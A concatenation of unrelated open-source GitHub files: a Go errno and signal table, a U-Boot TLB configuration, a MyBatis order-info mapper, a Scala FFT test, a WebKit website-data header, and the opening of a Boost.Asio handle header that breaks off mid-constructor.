SIGTERM = syscall.Signal(0xf)
SIGTHAW = syscall.Signal(0x23)
SIGTRAP = syscall.Signal(0x5)
SIGTSTP = syscall.Signal(0x18)
SIGTTIN = syscall.Signal(0x1a)
SIGTTOU = syscall.Signal(0x1b)
SIGURG = syscall.Signal(0x15)
SIGUSR1 = syscall.Signal(0x10)
SIGUSR2 = syscall.Signal(0x11)
SIGVTALRM = syscall.Signal(0x1c)
SIGWAITING = syscall.Signal(0x20)
SIGWINCH = syscall.Signal(0x14)
SIGXCPU = syscall.Signal(0x1e)
SIGXFSZ = syscall.Signal(0x1f)
SIGXRES = syscall.Signal(0x26)
)
// Error table
var errorList = [...]struct {
num syscall.Errno
name string
desc string
}{
{1, "EPERM", "not owner"},
{2, "ENOENT", "no such file or directory"},
{3, "ESRCH", "no such process"},
{4, "EINTR", "interrupted system call"},
{5, "EIO", "I/O error"},
{6, "ENXIO", "no such device or address"},
{7, "E2BIG", "arg list too long"},
{8, "ENOEXEC", "exec format error"},
{9, "EBADF", "bad file number"},
{10, "ECHILD", "no child processes"},
{11, "EAGAIN", "resource temporarily unavailable"},
{12, "ENOMEM", "not enough space"},
{13, "EACCES", "permission denied"},
{14, "EFAULT", "bad address"},
{15, "ENOTBLK", "block device required"},
{16, "EBUSY", "device busy"},
{17, "EEXIST", "file exists"},
{18, "EXDEV", "cross-device link"},
{19, "ENODEV", "no such device"},
{20, "ENOTDIR", "not a directory"},
{21, "EISDIR", "is a directory"},
{22, "EINVAL", "invalid argument"},
{23, "ENFILE", "file table overflow"},
{24, "EMFILE", "too many open files"},
{25, "ENOTTY", "inappropriate ioctl for device"},
{26, "ETXTBSY", "text file busy"},
{27, "EFBIG", "file too large"},
{28, "ENOSPC", "no space left on device"},
{29, "ESPIPE", "illegal seek"},
{30, "EROFS", "read-only file system"},
{31, "EMLINK", "too many links"},
{32, "EPIPE", "broken pipe"},
{33, "EDOM", "argument out of domain"},
{34, "ERANGE", "result too large"},
{35, "ENOMSG", "no message of desired type"},
{36, "EIDRM", "identifier removed"},
{37, "ECHRNG", "channel number out of range"},
{38, "EL2NSYNC", "level 2 not synchronized"},
{39, "EL3HLT", "level 3 halted"},
{40, "EL3RST", "level 3 reset"},
{41, "ELNRNG", "link number out of range"},
{42, "EUNATCH", "protocol driver not attached"},
{43, "ENOCSI", "no CSI structure available"},
{44, "EL2HLT", "level 2 halted"},
{45, "EDEADLK", "deadlock situation detected/avoided"},
{46, "ENOLCK", "no record locks available"},
{47, "ECANCELED", "operation canceled"},
{48, "ENOTSUP", "operation not supported"},
{49, "EDQUOT", "disc quota exceeded"},
{50, "EBADE", "bad exchange descriptor"},
{51, "EBADR", "bad request descriptor"},
{52, "EXFULL", "message tables full"},
{53, "ENOANO", "anode table overflow"},
{54, "EBADRQC", "bad request code"},
{55, "EBADSLT", "invalid slot"},
{56, "EDEADLOCK", "file locking deadlock"},
{57, "EBFONT", "bad font file format"},
{58, "EOWNERDEAD", "owner of the lock died"},
{59, "ENOTRECOVERABLE", "lock is not recoverable"},
{60, "ENOSTR", "not a stream device"},
{61, "ENODATA", "no data available"},
{62, "ETIME", "timer expired"},
{63, "ENOSR", "out of stream resources"},
{64, "ENONET", "machine is not on the network"},
{65, "ENOPKG", "package not installed"},
{66, "EREMOTE", "object is remote"},
{67, "ENOLINK", "link has been severed"},
{68, "EADV", "advertise error"},
{69, "ESRMNT", "srmount error"},
{70, "ECOMM", "communication error on send"},
{71, "EPROTO", "protocol error"},
{72, "ELOCKUNMAPPED", "locked lock was unmapped "},
{73, "ENOTACTIVE", "facility is not active"},
{74, "EMULTIHOP", "multihop attempted"},
{77, "EBADMSG", "not a data message"},
{78, "ENAMETOOLONG", "file name too long"},
{79, "EOVERFLOW", "value too large for defined data type"},
{80, "ENOTUNIQ", "name not unique on network"},
{81, "EBADFD", "file descriptor in bad state"},
{82, "EREMCHG", "remote address changed"},
{83, "ELIBACC", "can not access a needed shared library"},
{84, "ELIBBAD", "accessing a corrupted shared library"},
{85, "ELIBSCN", ".lib section in a.out corrupted"},
{86, "ELIBMAX", "attempting to link in more shared libraries than system limit"},
{87, "ELIBEXEC", "can not exec a shared library directly"},
{88, "EILSEQ", "illegal byte sequence"},
{89, "ENOSYS", "operation not applicable"},
{90, "ELOOP", "number of symbolic links encountered during path name traversal exceeds MAXSYMLINKS"},
{91, "ERESTART", "error 91"},
{92, "ESTRPIPE", "error 92"},
{93, "ENOTEMPTY", "directory not empty"},
{94, "EUSERS", "too many users"},
{95, "ENOTSOCK", "socket operation on non-socket"},
{96, "EDESTADDRREQ", "destination address required"},
{97, "EMSGSIZE", "message too long"},
{98, "EPROTOTYPE", "protocol wrong type for socket"},
{99, "ENOPROTOOPT", "option not supported by protocol"},
{120, "EPROTONOSUPPORT", "protocol not supported"},
{121, "ESOCKTNOSUPPORT", "socket type not supported"},
{122, "EOPNOTSUPP", "operation not supported on transport endpoint"},
{123, "EPFNOSUPPORT", "protocol family not supported"},
{124, "EAFNOSUPPORT", "address family not supported by protocol family"},
{125, "EADDRINUSE", "address already in use"},
{126, "EADDRNOTAVAIL", "cannot assign requested address"},
{127, "ENETDOWN", "network is down"},
{128, "ENETUNREACH", "network is unreachable"},
{129, "ENETRESET", "network dropped connection because of reset"},
{130, "ECONNABORTED", "software caused connection abort"},
{131, "ECONNRESET", "connection reset by peer"},
{132, "ENOBUFS", "no buffer space available"},
{133, "EISCONN", "transport endpoint is already connected"},
{134, "ENOTCONN", "transport endpoint is not connected"},
{143, "ESHUTDOWN", "cannot send after socket shutdown"},
{144, "ETOOMANYREFS", "too many references: cannot splice"},
{145, "ETIMEDOUT", "connection timed out"},
{146, "ECONNREFUSED", "connection refused"},
{147, "EHOSTDOWN", "host is down"},
{148, "EHOSTUNREACH", "no route to host"},
{149, "EALREADY", "operation already in progress"},
{150, "EINPROGRESS", "operation now in progress"},
{151, "ESTALE", "stale NFS file handle"},
}
// Signal table
var signalList = [...]struct {
num syscall.Signal
name string
desc string
}{
{1, "SIGHUP", "hangup"},
{2, "SIGINT", "interrupt"},
{3, "SIGQUIT", "quit"},
{4, "SIGILL", "illegal Instruction"},
{5, "SIGTRAP", "trace/Breakpoint Trap"},
{6, "SIGABRT", "abort"},
{7, "SIGEMT", "emulation Trap"},
{8, "SIGFPE", "arithmetic Exception"},
{9, "SIGKILL", "killed"},
{10, "SIGBUS", "bus Error"},
{11, "SIGSEGV", "segmentation Fault"},
{12, "SIGSYS", "bad System Call"},
{13, "SIGPIPE", "broken Pipe"},
{14, "SIGALRM", "alarm Clock"},
{15, "SIGTERM", "terminated"},
{16, "SIGUSR1", "user Signal 1"},
{17, "SIGUSR2", "user Signal 2"},
{18, "SIGCHLD", "child Status Changed"},
{19, "SIGPWR", "power-Fail/Restart"},
{20, "SIGWINCH", "window Size Change"},
{21, "SIGURG", "urgent Socket Condition"},
{22, "SIGIO", "pollable Event"},
{23, "SIGSTOP", "stopped (signal)"},
{24, "SIGTSTP", "stopped (user)"},
{25, "SIGCONT", "continued"},
{26, "SIGTTIN", "stopped (tty input)"},
{27, "SIGTTOU", "stopped (tty output)"},
{28, "SIGVTALRM", "virtual Timer Expired"},
{29, "SIGPROF", "profiling Timer Expired"},
{30, "SIGXCPU", "cpu Limit Exceeded"},
{31, "SIGXFSZ", "file Size Limit Exceeded"},
{32, "SIGWAITING", "no runnable lwp"},
{33, "SIGLWP", "inter-lwp signal"},
{34, "SIGFREEZE", "checkpoint Freeze"},
{35, "SIGTHAW", "checkpoint Thaw"},
{36, "SIGCANCEL", "thread Cancellation"},
{37, "SIGLOST", "resource Lost"},
{38, "SIGXRES", "resource Control Exceeded"},
{39, "SIGJVM1", "reserved for JVM 1"},
{40, "SIGJVM2", "reserved for JVM 2"},
{41, "SIGINFO", "information Request"},
}
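// Editorial sketch (hypothetical helper, not part of the generated file):
// errorList is sorted by errno number, so a lookup can binary-search it.
// Assumes the "sort" package is imported; the same pattern works for
// signalList.
func errnoName(e syscall.Errno) string {
i := sort.Search(len(errorList), func(i int) bool {
return errorList[i].num >= e
})
if i < len(errorList) && errorList[i].num == e {
return errorList[i].name
}
return ""
}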
| {
"pile_set_name": "Github"
} |
// SPDX-License-Identifier: GPL-2.0+
/*
* Copyright 2014 Freescale Semiconductor, Inc.
*/
#include <common.h>
#include <asm/mmu.h>
struct fsl_e_tlb_entry tlb_table[] = {
/* TLB 0 - for temp stack in cache */
SET_TLB_ENTRY(0, CONFIG_SYS_INIT_RAM_ADDR,
CONFIG_SYS_INIT_RAM_ADDR_PHYS,
MAS3_SX|MAS3_SW|MAS3_SR, 0,
0, 0, BOOKE_PAGESZ_4K, 0),
SET_TLB_ENTRY(0, CONFIG_SYS_INIT_RAM_ADDR + 4 * 1024,
CONFIG_SYS_INIT_RAM_ADDR_PHYS + 4 * 1024,
MAS3_SX|MAS3_SW|MAS3_SR, 0,
0, 0, BOOKE_PAGESZ_4K, 0),
SET_TLB_ENTRY(0, CONFIG_SYS_INIT_RAM_ADDR + 8 * 1024,
CONFIG_SYS_INIT_RAM_ADDR_PHYS + 8 * 1024,
MAS3_SX|MAS3_SW|MAS3_SR, 0,
0, 0, BOOKE_PAGESZ_4K, 0),
SET_TLB_ENTRY(0, CONFIG_SYS_INIT_RAM_ADDR + 12 * 1024,
CONFIG_SYS_INIT_RAM_ADDR_PHYS + 12 * 1024,
MAS3_SX|MAS3_SW|MAS3_SR, 0,
0, 0, BOOKE_PAGESZ_4K, 0),
/* TLB 1 */
/* *I*** - Covers boot page */
#if defined(CONFIG_SYS_RAMBOOT) && defined(CONFIG_SYS_INIT_L3_ADDR)
/*
 * *I*G - L3SRAM. When L3 is used as 256K SRAM, the SRAM starts at
 * 0xfffc0000 and covers the boot page at 0xfffff000.
 */
SET_TLB_ENTRY(1, CONFIG_SYS_INIT_L3_ADDR, CONFIG_SYS_INIT_L3_ADDR,
MAS3_SX|MAS3_SW|MAS3_SR, MAS2_I|MAS2_G,
0, 0, BOOKE_PAGESZ_256K, 1),
#else
SET_TLB_ENTRY(1, 0xfffff000, 0xfffff000,
MAS3_SX|MAS3_SW|MAS3_SR, MAS2_I|MAS2_G,
0, 0, BOOKE_PAGESZ_4K, 1),
#endif
/* *I*G* - CCSRBAR */
SET_TLB_ENTRY(1, CONFIG_SYS_CCSRBAR, CONFIG_SYS_CCSRBAR_PHYS,
MAS3_SX|MAS3_SW|MAS3_SR, MAS2_I|MAS2_G,
0, 1, BOOKE_PAGESZ_16M, 1),
/* W**G* - Flash, localbus */
/* This will be changed to *I*G* after relocation to RAM. */
SET_TLB_ENTRY(1, CONFIG_SYS_FLASH_BASE, CONFIG_SYS_FLASH_BASE_PHYS,
MAS3_SX|MAS3_SR, MAS2_W|MAS2_G,
0, 2, BOOKE_PAGESZ_256M, 1),
#ifndef CONFIG_SPL_BUILD
/* *I*G* - PCI */
SET_TLB_ENTRY(1, CONFIG_SYS_PCIE1_MEM_VIRT, CONFIG_SYS_PCIE1_MEM_PHYS,
MAS3_SX|MAS3_SW|MAS3_SR, MAS2_I|MAS2_G,
0, 3, BOOKE_PAGESZ_1G, 1),
/* *I*G* - PCI I/O */
SET_TLB_ENTRY(1, CONFIG_SYS_PCIE1_IO_VIRT, CONFIG_SYS_PCIE1_IO_PHYS,
MAS3_SX|MAS3_SW|MAS3_SR, MAS2_I|MAS2_G,
0, 4, BOOKE_PAGESZ_256K, 1),
/* Bman/Qman */
#ifdef CONFIG_SYS_BMAN_MEM_PHYS
SET_TLB_ENTRY(1, CONFIG_SYS_BMAN_MEM_BASE, CONFIG_SYS_BMAN_MEM_PHYS,
MAS3_SX|MAS3_SW|MAS3_SR, 0,
0, 5, BOOKE_PAGESZ_16M, 1),
SET_TLB_ENTRY(1, CONFIG_SYS_BMAN_MEM_BASE + 0x01000000,
CONFIG_SYS_BMAN_MEM_PHYS + 0x01000000,
MAS3_SX|MAS3_SW|MAS3_SR, MAS2_I|MAS2_G,
0, 6, BOOKE_PAGESZ_16M, 1),
#endif
#ifdef CONFIG_SYS_QMAN_MEM_PHYS
SET_TLB_ENTRY(1, CONFIG_SYS_QMAN_MEM_BASE, CONFIG_SYS_QMAN_MEM_PHYS,
MAS3_SX|MAS3_SW|MAS3_SR, 0,
0, 7, BOOKE_PAGESZ_16M, 1),
SET_TLB_ENTRY(1, CONFIG_SYS_QMAN_MEM_BASE + 0x01000000,
CONFIG_SYS_QMAN_MEM_PHYS + 0x01000000,
MAS3_SX|MAS3_SW|MAS3_SR, MAS2_I|MAS2_G,
0, 8, BOOKE_PAGESZ_16M, 1),
#endif
#endif
#ifdef CONFIG_SYS_DCSRBAR_PHYS
SET_TLB_ENTRY(1, CONFIG_SYS_DCSRBAR, CONFIG_SYS_DCSRBAR_PHYS,
MAS3_SX|MAS3_SW|MAS3_SR, MAS2_I|MAS2_G,
0, 9, BOOKE_PAGESZ_4M, 1),
#endif
#ifdef CONFIG_SYS_NAND_BASE
SET_TLB_ENTRY(1, CONFIG_SYS_NAND_BASE, CONFIG_SYS_NAND_BASE_PHYS,
MAS3_SX|MAS3_SW|MAS3_SR, MAS2_I|MAS2_G,
0, 10, BOOKE_PAGESZ_64K, 1),
#endif
#ifdef QIXIS_BASE
SET_TLB_ENTRY(1, QIXIS_BASE, QIXIS_BASE_PHYS,
MAS3_SX|MAS3_SW|MAS3_SR, MAS2_I|MAS2_G,
0, 11, BOOKE_PAGESZ_4K, 1),
#endif
#if defined(CONFIG_RAMBOOT_PBL) && !defined(CONFIG_SPL_BUILD)
SET_TLB_ENTRY(1, CONFIG_SYS_DDR_SDRAM_BASE, CONFIG_SYS_DDR_SDRAM_BASE,
MAS3_SX|MAS3_SW|MAS3_SR, MAS2_M,
0, 12, BOOKE_PAGESZ_1G, 1),
SET_TLB_ENTRY(1, CONFIG_SYS_DDR_SDRAM_BASE + 0x40000000,
CONFIG_SYS_DDR_SDRAM_BASE + 0x40000000,
MAS3_SX|MAS3_SW|MAS3_SR, MAS2_M,
0, 13, BOOKE_PAGESZ_1G, 1)
#endif
/* Entries 14 and 15 are hard-coded elsewhere and will be disabled in
 * cpu_init_f, so if more entries are needed, use entry 16 onward.
 */
};
int num_tlb_entries = ARRAY_SIZE(tlb_table);
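/*
 * Editorial sketch (hypothetical): early init code typically walks this
 * table and programs one TLB entry per element, roughly:
 *
 * for (i = 0; i < num_tlb_entries; i++)
 * write_tlb(tlb_table[i].mas0, tlb_table[i].mas1,
 * tlb_table[i].mas2, tlb_table[i].mas3,
 * tlb_table[i].mas7);
 *
 * The write_tlb() signature and the mas0..mas7 field names are assumptions
 * made for illustration.
 */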
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE mapper PUBLIC "-//mybatis.org//DTD Mapper 3.0//EN"
"http://mybatis.org/dtd/mybatis-3-mapper.dtd">
<mapper namespace="com.github.chengzhx76.service.order.dao.OrderInfoDaoMapper">
<sql id="tableName">order_info</sql>
<sql id="columns">
o.id,o.account_id,o.oid,o.relate_oid,o.amount_payable,o.amount_paid,o.consignee,o.mobile,o.address,o.delivery_time,o.pay,o.arayacak_address,
o.arayacak_delivery_time,o.province,o.city,o.country,o.village,o.order_type,o.freight_reduce,o.freight_payable,o.bonus_point_reduce_price,o.product_total_price,o.discount,
o.balance_offset,o.remark_customer,o.post_code,o.telephone,o.email,o.pay_time,o.pay_way,o.exchange_oid,o.coupon_code,o.coupon_reduce_price,o.flow_status,o.is_free_account_level,o.comment_id,o.since,o.order_status,
o.remarks,o.create_date,o.update_date,o.status
</sql>
<sql id="insertColumns">
id,account_id,oid,relate_oid,amount_payable,amount_paid,consignee,mobile,address,delivery_time,pay,arayacak_address,arayacak_delivery_time,
province,city,country,village,order_type,freight_reduce,freight_payable,product_total_price,discount,remark_customer,balance_offset,post_code,
telephone,email,pay_time,pay_way,exchange_oid,coupon_code,coupon_reduce_price,flow_status,bonus_point_reduce_price,is_free_account_level,comment_id,since,order_status,
remarks,create_date,update_date,status
</sql>
<sql id="orderInfoIf">
<if test="id != null and id != ''">id=#{id},</if>
<if test="accountId != null and accountId != ''">account_id=#{accountId},</if>
<if test="oid != null and oid != ''">oid=#{oid},</if>
<if test="relateOid != null and relateOid != ''">relate_oid=#{relateOid},</if>
<if test="amountPayable != null and amountPayable != ''">amount_payable=#{amountPayable},</if>
<if test="amountPaid != null and amountPaid != ''">amount_paid=#{amountPaid},</if>
<if test="consignee != null and consignee != ''">consignee=#{consignee},</if>
<if test="mobile != null and mobile != ''">mobile=#{mobile},</if>
<if test="address != null and address != ''">address=#{address},</if>
<if test="deliveryTime != null and deliveryTime != ''">delivery_time=#{deliveryTime},</if>
<if test="pay != null and pay != ''">pay=#{pay},</if>
<if test="arayacakAddress != null and arayacakAddress != ''">arayacak_address=#{arayacakAddress},</if>
<if test="arayacakDeliveryTime != null and arayacakDeliveryTime != ''">arayacak_delivery_time=#{arayacakDeliveryTime},</if>
<if test="province != null and province != ''">province=#{province},</if>
<if test="city != null and city != ''">city=#{city},</if>
<if test="country != null and country != ''">country=#{country},</if>
<if test="village != null and village != ''">village=#{village},</if>
<if test="orderType != null and orderType != ''">order_type=#{orderType},</if>
<if test="freightReduce != null and freightReduce != ''">freight_reduce=#{freightReduce},</if>
<if test="freightPayable != null and freightPayable != ''">freight_payable=#{freightPayable},</if>
<if test="productTotalPrice != null and productTotalPrice != ''">product_total_price=#{productTotalPrice},</if>
<if test="discount != null and discount != ''">discount=#{discount},</if>
<if test="balanceOffset != null and balanceOffset != ''">balance_offset=#{balanceOffset},</if>
<if test="remarkCustomer != null and remarkCustomer != ''">remark_customer=#{remarkCustomer},</if>
<if test="postCode != null and postCode != ''">post_code=#{postCode},</if>
<if test="telephone != null and telephone != ''">telephone=#{telephone},</if>
<if test="email != null and email != ''">email=#{email},</if>
<if test="payTime != null and payTime != ''">pay_time=#{payTime},</if>
<if test="payWay != null and payWay != ''">pay_way=#{payWay},</if>
<if test="exchangeOid != null and exchangeOid != ''">exchange_oid=#{exchangeOid},</if>
<if test="couponCode != null and couponCode != ''">coupon_code=#{couponCode},</if>
<if test="couponReducePrice != null and couponReducePrice != ''">coupon_reduce_price=#{couponReducePrice},</if>
<if test="flowStatus != null and flowStatus != ''">flow_status=#{flowStatus},</if>
<if test="bonusPointReducePrice != null and bonusPointReducePrice != ''">bonus_point_reduce_price=#{bonusPointReducePrice},</if>
<if test="isFreeAccountLevel != null and isFreeAccountLevel != ''">is_free_account_level=#{isFreeAccountLevel},</if>
<if test="commentId != null and commentId != ''">comment_Id=#{commentId},</if>
<if test="since != null and since != ''">since=#{since},</if>
<if test="orderStatus != null">order_status=#{orderStatus},</if>
<if test="remarks != null and remarks != ''">remarks=#{remarks},</if>
<if test="createDate != null">create_date=#{createDate},</if>
<if test="updateDate != null">update_date=#{updateDate},</if>
<if test="status != null">status=#{status}</if>
</sql>
<sql id="orderInfoSelector">
select
<include refid="columns"/>
from
<include refid="tableName"/> AS o
</sql>
<sql id="orderInfoWhere">
<where>
<if test="id != null and id != ''">
id = #{id}
</if>
<if test="accountId != null and accountId != ''">
account_id = #{accountId}
</if>
<choose>
<when test="status != null and status !=''">
AND status = #{status}
</when>
<otherwise>
AND status != 'DELETE'
</otherwise>
</choose>
</where>
</sql>
<sql id="orderInfoUpdate">
<trim prefix="SET" suffixOverrides=",">
<include refid="orderInfoIf"/>
</trim>
</sql>
<!-- =================================================================== -->
<select id="load" parameterType="OrderInfo" resultType="OrderInfo">
<include refid="orderInfoSelector"/>
<include refid="orderInfoWhere"/>
</select>
<!-- Load all -->
<select id="loadAll" resultType="OrderInfo">
<include refid="orderInfoSelector"/>
<include refid="orderInfoWhere"/>
</select>
<!-- Load by user id, ordered by create date (newest first) -->
<select id="loadByUserIdOrderByCreateDate" resultType="OrderInfo">
<include refid="orderInfoSelector"/>
<include refid="orderInfoWhere"/>
ORDER BY create_date DESC
</select>
<!-- Update -->
<update id="update" parameterType="OrderInfo">
UPDATE <include refid="tableName"/>
<include refid="orderInfoUpdate"/>
<include refid="orderInfoWhere"/>
</update>
<!-- Insert -->
<insert id="save" parameterType="OrderInfo">
INSERT INTO
<include refid="tableName"/>
(
<include refid="insertColumns"/>
)
VALUES
(
#{id},#{accountId},#{oid},#{relateOid},#{amountPayable},#{amountPaid},#{consignee},#{mobile},#{address},#{deliveryTime},#{pay},#{arayacakAddress},#{arayacakDeliveryTime},
#{province},#{city},#{country},#{village},#{orderType},#{freightReduce},#{freightPayable},#{productTotalPrice},#{discount},#{remarkCustomer},#{balanceOffset},#{postCode},
#{telephone},#{email},#{payTime},#{payWay},#{exchangeOid},#{couponCode},#{couponReducePrice},#{flowStatus},#{bonusPointReducePrice},#{isFreeAccountLevel},#{commentId},#{since},#{orderStatus},
#{remarks},#{createDate},#{updateDate},#{status}
)
</insert>
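<!-- Editorial sketch (hypothetical): the matching DAO interface declares one
method per statement id above, and MyBatis binds each call by id, e.g.
OrderInfo load(OrderInfo query);
List<OrderInfo> loadAll(OrderInfo query);
List<OrderInfo> loadByUserIdOrderByCreateDate(OrderInfo query);
int update(OrderInfo order);
int save(OrderInfo order);
The method names mirror the ids; the parameter shapes are assumptions. -->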
</mapper>
| {
"pile_set_name": "Github"
} |
package keystoneml.nodes.stats
import breeze.linalg._
import org.apache.spark.SparkContext
import org.scalatest.FunSuite
import keystoneml.pipelines.Logging
import keystoneml.utils.Stats
import keystoneml.workflow.PipelineContext
class PaddedFFTSuite extends FunSuite with PipelineContext with Logging {
test("Test PaddedFFT node") {
sc = new SparkContext("local", "test")
// Set up test input vectors.
val ones = DenseVector.zeros[Double](100)
val twos = DenseVector.zeros[Double](100)
ones(0) = 1.0
twos(2) = 1.0
val x = sc.parallelize(Seq(twos, ones))
val fftd = PaddedFFT().apply(x).collect()
val twosout = fftd(0)
val onesout = fftd(1)
// Proof by agreement w/ R: Re(fft(c(0, 0, 1, rep(0, 125))))
assert(twosout.length === 64)
assert(Stats.aboutEq(twosout(0), 1.0))
assert(Stats.aboutEq(twosout(16), 0.0))
assert(Stats.aboutEq(twosout(32), -1.0))
assert(Stats.aboutEq(twosout(48), 0.0))
// Proof by agreement w/ R: Re(fft(c(1, rep(0, 127))))
assert(Stats.aboutEq(onesout, DenseVector.ones[Double](64)))
}
}
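// Editorial note: the length-64 assertions above follow from PaddedFFT
// zero-padding each length-100 vector to 128 samples (matching the R
// reference checks over 128-point inputs) and keeping the real components
// of the positive-frequency half.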
| {
"pile_set_name": "Github"
} |
/*
* Copyright (C) 2017 Igalia S.L.
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Library General Public
* License as published by the Free Software Foundation; either
* version 2 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Library General Public License for more details.
*
* You should have received a copy of the GNU Library General Public License
* along with this library; see the file COPYING.LIB. If not, write to
* the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor,
* Boston, MA 02110-1301, USA.
*/
#if !defined(__WEBKIT_H_INSIDE__) && !defined(WEBKIT2_COMPILATION)
#error "Only <wpe/webkit.h> can be included directly."
#endif
#ifndef WebKitWebsiteData_h
#define WebKitWebsiteData_h
#include <glib-object.h>
#include <wpe/WebKitDefines.h>
G_BEGIN_DECLS
#define WEBKIT_TYPE_WEBSITE_DATA (webkit_website_data_get_type())
typedef struct _WebKitWebsiteData WebKitWebsiteData;
/**
* WebKitWebsiteDataTypes:
* @WEBKIT_WEBSITE_DATA_MEMORY_CACHE: Memory cache.
* @WEBKIT_WEBSITE_DATA_DISK_CACHE: HTTP disk cache.
* @WEBKIT_WEBSITE_DATA_OFFLINE_APPLICATION_CACHE: Offline web application cache.
* @WEBKIT_WEBSITE_DATA_SESSION_STORAGE: Session storage data.
* @WEBKIT_WEBSITE_DATA_LOCAL_STORAGE: Local storage data.
* @WEBKIT_WEBSITE_DATA_WEBSQL_DATABASES: WebSQL databases. Deprecated 2.24
* @WEBKIT_WEBSITE_DATA_INDEXEDDB_DATABASES: IndexedDB databases.
* @WEBKIT_WEBSITE_DATA_PLUGIN_DATA: Plugins data. Deprecated 2.32
* @WEBKIT_WEBSITE_DATA_COOKIES: Cookies.
* @WEBKIT_WEBSITE_DATA_DEVICE_ID_HASH_SALT: Hash salt used to generate the device ids used by webpages. Since 2.24
* @WEBKIT_WEBSITE_DATA_HSTS_CACHE: HSTS cache. Since 2.26
* @WEBKIT_WEBSITE_DATA_ITP: Intelligent Tracking Prevention data. Since 2.30.
* @WEBKIT_WEBSITE_DATA_SERVICE_WORKER_REGISTRATIONS: Service worker registrations. Since 2.30
* @WEBKIT_WEBSITE_DATA_DOM_CACHE: DOM (CacheStorage) cache. Since 2.30
* @WEBKIT_WEBSITE_DATA_ALL: All types.
*
* Enum values with flags representing types of Website data.
*
* Since: 2.16
*/
typedef enum {
WEBKIT_WEBSITE_DATA_MEMORY_CACHE = 1 << 0,
WEBKIT_WEBSITE_DATA_DISK_CACHE = 1 << 1,
WEBKIT_WEBSITE_DATA_OFFLINE_APPLICATION_CACHE = 1 << 2,
WEBKIT_WEBSITE_DATA_SESSION_STORAGE = 1 << 3,
WEBKIT_WEBSITE_DATA_LOCAL_STORAGE = 1 << 4,
WEBKIT_WEBSITE_DATA_WEBSQL_DATABASES = 1 << 5,
WEBKIT_WEBSITE_DATA_INDEXEDDB_DATABASES = 1 << 6,
WEBKIT_WEBSITE_DATA_PLUGIN_DATA = 1 << 7,
WEBKIT_WEBSITE_DATA_COOKIES = 1 << 8,
WEBKIT_WEBSITE_DATA_DEVICE_ID_HASH_SALT = 1 << 9,
WEBKIT_WEBSITE_DATA_HSTS_CACHE = 1 << 10,
WEBKIT_WEBSITE_DATA_ITP = 1 << 11,
WEBKIT_WEBSITE_DATA_SERVICE_WORKER_REGISTRATIONS = 1 << 12,
WEBKIT_WEBSITE_DATA_DOM_CACHE = 1 << 13,
WEBKIT_WEBSITE_DATA_ALL = (1 << 14) - 1
} WebKitWebsiteDataTypes;
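/* Editorial sketch (hypothetical usage, not part of this header): the values
 * above are bit flags and are meant to be combined, e.g.
 *
 * WebKitWebsiteDataTypes types =
 * WEBKIT_WEBSITE_DATA_COOKIES | WEBKIT_WEBSITE_DATA_LOCAL_STORAGE;
 */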
WEBKIT_API GType
webkit_website_data_get_type (void);
WEBKIT_API WebKitWebsiteData *
webkit_website_data_ref (WebKitWebsiteData *website_data);
WEBKIT_API void
webkit_website_data_unref (WebKitWebsiteData *website_data);
WEBKIT_API const char *
webkit_website_data_get_name (WebKitWebsiteData *website_data);
WEBKIT_API WebKitWebsiteDataTypes
webkit_website_data_get_types (WebKitWebsiteData *website_data);
WEBKIT_API guint64
webkit_website_data_get_size (WebKitWebsiteData *website_data,
WebKitWebsiteDataTypes types);
G_END_DECLS
#endif /* WebKitWebsiteData_h */
| {
"pile_set_name": "Github"
} |
//
// windows/basic_handle.hpp
// ~~~~~~~~~~~~~~~~~~~~~~~~
//
// Copyright (c) 2003-2014 Christopher M. Kohlhoff (chris at kohlhoff dot com)
//
// Distributed under the Boost Software License, Version 1.0. (See accompanying
// file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
//
#ifndef BOOST_ASIO_WINDOWS_BASIC_HANDLE_HPP
#define BOOST_ASIO_WINDOWS_BASIC_HANDLE_HPP
#if defined(_MSC_VER) && (_MSC_VER >= 1200)
# pragma once
#endif // defined(_MSC_VER) && (_MSC_VER >= 1200)
#include <boost/asio/detail/config.hpp>
#if defined(BOOST_ASIO_HAS_WINDOWS_RANDOM_ACCESS_HANDLE) \
|| defined(BOOST_ASIO_HAS_WINDOWS_STREAM_HANDLE) \
|| defined(BOOST_ASIO_HAS_WINDOWS_OBJECT_HANDLE) \
|| defined(GENERATING_DOCUMENTATION)
#include <boost/asio/basic_io_object.hpp>
#include <boost/asio/detail/throw_error.hpp>
#include <boost/asio/error.hpp>
#include <boost/asio/detail/push_options.hpp>
namespace boost {
namespace asio {
namespace windows {
/// Provides Windows handle functionality.
/**
* The windows::basic_handle class template provides the ability to wrap a
* Windows handle.
*
* @par Thread Safety
* @e Distinct @e objects: Safe.@n
* @e Shared @e objects: Unsafe.
*/
template <typename HandleService>
class basic_handle
: public basic_io_object<HandleService>
{
public:
/// (Deprecated: Use native_handle_type.) The native representation of a
/// handle.
typedef typename HandleService::native_handle_type native_type;
/// The native representation of a handle.
typedef typename HandleService::native_handle_type native_handle_type;
/// A basic_handle is always the lowest layer.
typedef basic_handle<HandleService> lowest_layer_type;
/// Construct a basic_handle without opening it.
/**
* This constructor creates a handle without opening it.
*
* @param io_service The io_service object that the handle will use to
* dispatch handlers for any asynchronous operations performed on the handle.
*/
explicit basic_handle(boost::asio::io_service& io_service)
: basic_io_object<HandleService>(io_service)
{
}
/// Construct a basic_handle on an existing native handle.
/**
* This constructor creates a handle object to hold an existing native handle.
*
* @param io_service The io_service object that the handle will use to
* dispatch handlers for any asynchronous operations performed on the handle.
*
* @param handle A native handle.
*
* @throws boost::system::system_error Thrown on failure.
*/
basic_handle(boost::asio::io_service& io_service,
const native_handle_type& handle)
: basic_io_object<HandleService>(io_service)
{
boost::system::error_code ec;
this->get_service().assign(this->get_implementation(), handle, ec);
boost::asio::detail::throw_error(ec, "assign");
}
#if defined(BOOST_ASIO_HAS_MOVE) || defined(GENERATING_DOCUMENTATION)
/// Move-construct a basic_handle from another.
/**
* This constructor moves a handle from one object to another.
*
* @param other The other basic_handle object from which the move will occur.
*
* @note Following the move, the moved-from object is in the same state as if
* constructed using the @c basic_handle(io_service&) constructor.
*/
basic_handle(basic_handle&& other)
: basic_io_object<HandleService>(
